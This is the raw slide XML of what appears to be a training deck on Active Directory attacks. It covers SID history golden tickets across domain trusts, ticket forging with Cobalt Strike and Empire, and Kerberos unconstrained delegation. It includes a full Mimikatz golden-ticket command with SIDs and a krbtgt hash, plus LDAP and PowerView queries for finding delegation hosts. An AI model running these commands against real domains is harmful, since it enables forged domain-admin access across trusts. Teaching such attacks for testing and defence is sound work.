              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Simple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2FBFD0-3B01-C754-59CB-5FA896FD6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0998537" y="3515137"/>
            <a:ext cx="676606" cy="3383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seal by yves_guillou">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF15977-5B0E-AE90-5DB5-623B9DC99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893" y="5678467"/>
            <a:ext cx="377289" cy="519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 seal by yves_guillou">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D7902A-F96C-5CED-1C22-915CDC044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737" y="6161896"/>
            <a:ext cx="377289" cy="51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1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5BD1-B02B-E8B6-7301-2C2B23F2B0EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Execute SID History Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014AB000-1BE1-18D8-C618-D1647C8531DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can forge this golden trust (pun intended) ticket with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The SID of the root domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>User to impersonate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> hash of child domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{538A163D-917F-B033-BD88-8D0BED118175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="3153105"/>
            <a:ext cx="11334750" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000"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Mimikatz.exe kerberos::golden /user:DC01$ /domain:dev.asgard.corp /sid:S-1-5-21-2866327014-263153327-3370111089 /sids:S-1-5-21-2716382980-2373322634-4127565559-516,S-1-5-9 /krbtgt:e818c815dfa9a5f03cae9d1687d59e68 /ptt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39A82251-436C-08BF-0D8D-26463902E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02062" y="3153081"/>
            <a:ext cx="420383" cy="420383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267176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4D72-FCF6-E313-F114-701511EB4ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopping the Trust: Parent/Child: C2s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49ACC626-247B-EACF-86FA-D78688CD9D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike have built-in golden ticket creation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The bundled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> functionality allows to create the golden ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Do it offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execute-Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> task to run a newer version of Rubeus or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire supports golden ticket creation natively with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mimikatz</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golden_ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>task.</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125659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66B0-9F44-58F1-E334-54D7A9D2BFD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopping the Trust: Tree Root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD0F84A-0E87-BE66-292C-31C7867750F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain controllers are configured for unconstrained delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Required for DC functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Unconstrained delegation should ring a bell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Coerce authentication cross trust means compromising cross trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Same attack scenario as "normal" constrained delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8802D5-7335-11FD-6DCC-A72B1FB6CDEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151172" y="3729030"/>
            <a:ext cx="9889655" cy="1775884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092662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2D4A-C633-C3CB-6BA1-4F21549CF6F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F3D279-898B-9555-B860-470BADCDBA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos delegation is a Kerberos feature that allows services to execute actions on behalf of authenticated users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three types of delegations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resource-based constrained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="954068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37531-58AD-3D54-6757-5448C1B928F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained delegation replaces the PAC in a TGS with a full TGT. What could go wrong? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A710793-725D-A5A7-4A11-E7ECA536BB78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6ECCBA-F270-075C-80E4-E68D7C756972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081087" y="2682213"/>
            <a:ext cx="5140035" cy="2775612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Multiplication Sign 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1158F771-A171-7D0A-208F-0F8240C0A4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118829" y="3544953"/>
            <a:ext cx="1187919" cy="1365265"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6711C991-06C7-7119-1708-F6EF1596975A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722732" y="3598319"/>
            <a:ext cx="3388181" cy="1311898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Right 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2435AF0E-D346-91F8-AC2F-EC62C718451F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6253353" y="4021721"/>
            <a:ext cx="1414193" cy="423405"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175712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C1AE-E888-B114-DD19-89DBD191054A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation Flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD22CBF-B55D-7280-5A32-55E2C8366F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138362" y="1295241"/>
            <a:ext cx="7915276" cy="5196024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2865383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FBC98-8FFE-24EC-683D-E6D9BB7C637A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can find unconstrained delegation computers using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SharpView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or if you are brave enough, LDAP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51603EAE-7A5B-D36B-8C6E-F620CCB430B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recognizing Unconstrained Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60AA395-FB11-57D2-7A05-296F1FD01351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538164" y="2389439"/>
            <a:ext cx="11225210" cy="1290483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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#LDAP</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PS C:\&gt;</a:t>
            </a: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([adsisearcher]'(&amp;(objectcategory=computer)((userAccountControl:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0"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1.2.840.113556.1.4.803:=524288)))').FindAll().GetDirectoryEntry() | Select-Object -Property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Arial" panose="020B0502020104020203" pitchFamily="34"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F56AF254-91D1-9FD5-8904-77BF7A93393D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538164" y="3828761"/>
            <a:ext cx="11225210" cy="735371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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#PowerView</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PS C:\&gt; </a:t>
            </a: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Get-DomainComputer -Unconstrained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3455A591-EB95-1C76-D557-CE12DF5E2E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538164" y="4706547"/>
            <a:ext cx="11225210" cy="735371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>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#SharpView</a:t>
            </a:r>
          </a:p>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PS C:\&gt; </a:t>
            </a:r>
            <a:r>
